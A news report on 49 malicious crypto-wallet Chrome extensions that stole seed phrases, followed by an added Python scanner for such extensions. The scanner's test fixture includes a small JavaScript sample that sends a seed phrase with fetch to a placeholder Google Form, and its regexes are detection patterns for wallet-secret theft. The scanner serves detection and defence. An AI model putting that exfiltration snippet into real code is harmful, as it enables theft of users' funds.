Google removes crypto-stealing Chrome extensions from its online store

Google has removed 49 malicious Chrome extensions from the Chrome Web Store. The extensions posed as cryptocurrency wallet apps but in fact harvested the private keys and seed phrases of users' wallets and, with them, the users' funds. As reported by ZDNet, the extensions were first identified by Harry Denley, chief security officer at MyCrypto, who shared his findings with the media. According to Denley, all 49 extensions appear to have been created by the same person or group, whom he believes to be Russia-based threat actors. All of the extensions share the same functionality; only the branding changes according to the wallet's users being targeted. Denley identified malicious extensions masquerading as many well-known wallets, including Ledger, Trezor, Jaxx, Electrum, MyEtherWallet, MetaMask, Exodus, and KeepKey.

Malicious Crypto Wallet Extensions

The 49 malicious extensions behave much like the legitimate wallet extensions they imitate, with one difference: everything a user enters during wallet setup (the seed phrase or private key that unlocks the wallet) is sent to servers controlled by the attacker, or in some cases to a Google Form. Although that gives the attackers everything they need to drain a wallet, Denley found in a test that funds placed in a wallet set up through one of the extensions were not stolen immediately. He suspects the threat actor is only interested in high-value targets, or has not yet automated the theft and must access each account manually. In a post on Medium, MyCrypto noted that malicious extensions targeting cryptocurrency users have become more frequent in recent months: “An analysis of our dataset suggests that malicious extensions slowly started to hit the store in February 2020, they ramped up versions until March 2020 and then quickly released more extensions in April 2020. This means that our detection is greatly improving or the number of malicious extensions hitting browser stores to target cryptocurrency users is growing exponentially. Speculating, it's hard to say why.” Since the threat actor behind these extensions has not been identified, they will likely attempt a similar campaign in the future. via ZDNet
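The behaviour described above (a wallet-branded extension that collects a seed phrase or private key during setup and submits it to a Google Form or to a remote host) can be spotted in an unpacked extension's files before it is ever loaded. The scanner below is an added example written for this page; it is not code from the article, from MyCrypto, or from Harry Denley. It walks extension directories, parses each manifest.json, flags names and descriptions that borrow one of the wallet brands listed in the article, and flags JavaScript that both references seed phrases or private keys and calls a network API, or that targets a Google Forms formResponse endpoint. The indicator lists, the regular expressions, the `EXAMPLE-FORM-ID` form URL and the two sample extensions are all constructed for the example and are assumptions, not data from the article.

```python
"""Scan unpacked Chrome extensions for crypto-wallet phishing indicators.

Added example for this article, not MyCrypto's or Denley's tooling. The
indicators are the author's assumptions about what such an extension has to
contain: a wallet brand in its listing, code that handles a seed phrase or
private key, and a way to send it off-box (a Google Form or any remote host).
"""
import json
import pathlib
import re
import tempfile

# Wallet brands the article says were impersonated (lower-case for matching).
WALLET_BRANDS = ("ledger", "trezor", "jaxx", "electrum", "myetherwallet",
                 "metamask", "exodus", "keepkey")
# Secrets a fake wallet must ask for during "setup".
SECRET_TERMS = re.compile(r"\b(mnemonic|seed ?phrase|recovery ?phrase|private ?key)\b", re.I)
# Google Forms submission endpoint, one of the two exfil channels the article mentions.
GOOGLE_FORM = re.compile(r"""https://docs\.google\.com/forms/[^\s"']*?/formResponse""")
# Browser APIs an extension would use to ship data to a remote host.
NETWORK_CALL = re.compile(r"\b(fetch|XMLHttpRequest|navigator\.sendBeacon)\b")
HOST = re.compile(r"https?://([A-Za-z0-9.-]+)")


def scan_extension(ext_dir: pathlib.Path) -> dict:
    """Return {id, name, findings} for one unpacked extension directory."""
    manifest = json.loads((ext_dir / "manifest.json").read_text(encoding="utf-8"))
    findings = []

    blurb = f"{manifest.get('name', '')} {manifest.get('description', '')}".lower()
    brands = [b for b in WALLET_BRANDS if b in blurb]
    if brands:
        findings.append(f"impersonates wallet brand(s): {', '.join(brands)}")

    for js in sorted(ext_dir.rglob("*.js")):
        src = js.read_text(encoding="utf-8", errors="ignore")
        for form in GOOGLE_FORM.findall(src):
            findings.append(f"{js.name}: submits to Google Form {form}")
        if SECRET_TERMS.search(src) and NETWORK_CALL.search(src):
            hosts = sorted(set(HOST.findall(src)))
            findings.append(f"{js.name}: handles seed/private key and talks to {hosts}")

    return {"id": ext_dir.name, "name": manifest.get("name"), "findings": findings}


def scan_tree(root: pathlib.Path) -> dict:
    """Scan every directory under root that holds a manifest.json.

    A real Chrome profile nests one more level (Extensions/<id>/<version>/);
    the constructed sample below flattens that to root/<id>/.
    """
    return {d.name: scan_extension(d) for d in sorted(root.iterdir())
            if (d / "manifest.json").is_file()}


# Constructed sample extensions (not real store listings) used to exercise the scanner.
SAMPLES = {
    "notes-ext": {
        "manifest.json": json.dumps({"manifest_version": 3, "name": "Quick Notes",
                                     "description": "Keep notes in your browser",
                                     "version": "1.0"}),
        "notes.js": "chrome.storage.local.set({note: document.getElementById('n').value});\n",
    },
    "fake-wallet": {
        "manifest.json": json.dumps({"manifest_version": 3, "name": "Ledger Wallet Helper",
                                     "description": "Set up your Ledger wallet",
                                     "version": "2.1"}),
        "setup.js": (
            "const FORM = 'https://docs.google.com/forms/d/e/EXAMPLE-FORM-ID/formResponse';\n"
            "function onSetup(seedPhrase) {\n"
            "  const body = new URLSearchParams({'entry.1': seedPhrase});\n"
            "  fetch(FORM, {method: 'POST', mode: 'no-cors', body});\n"
            "}\n"
        ),
    },
}


def write_samples(root: pathlib.Path) -> None:
    for ext_id, files in SAMPLES.items():
        for name, content in files.items():
            path = root / ext_id / name
            path.parent.mkdir(parents=True, exist_ok=True)
            path.write_text(content, encoding="utf-8")


def demo() -> dict:
    """Write the constructed samples to a temp dir and return the scan results."""
    with tempfile.TemporaryDirectory() as tmp:
        root = pathlib.Path(tmp)
        write_samples(root)
        return scan_tree(root)


if __name__ == "__main__":
    for ext_id, report in demo().items():
        status = "SUSPICIOUS" if report["findings"] else "clean"
        print(f"{ext_id} ({report['name']}): {status}")
        for finding in report["findings"]:
            print("  -", finding)
```

Against the sample, the notes extension produces no findings while the fake wallet is flagged three times: for the Ledger branding, for the Google Forms endpoint, and for combining seed-phrase handling with a `fetch` to docs.google.com. The regexes are deliberately simple; obfuscated or minified code will need the same checks applied after deobfuscation, and a brand match alone is only a lead, since legitimate companion extensions also carry these names.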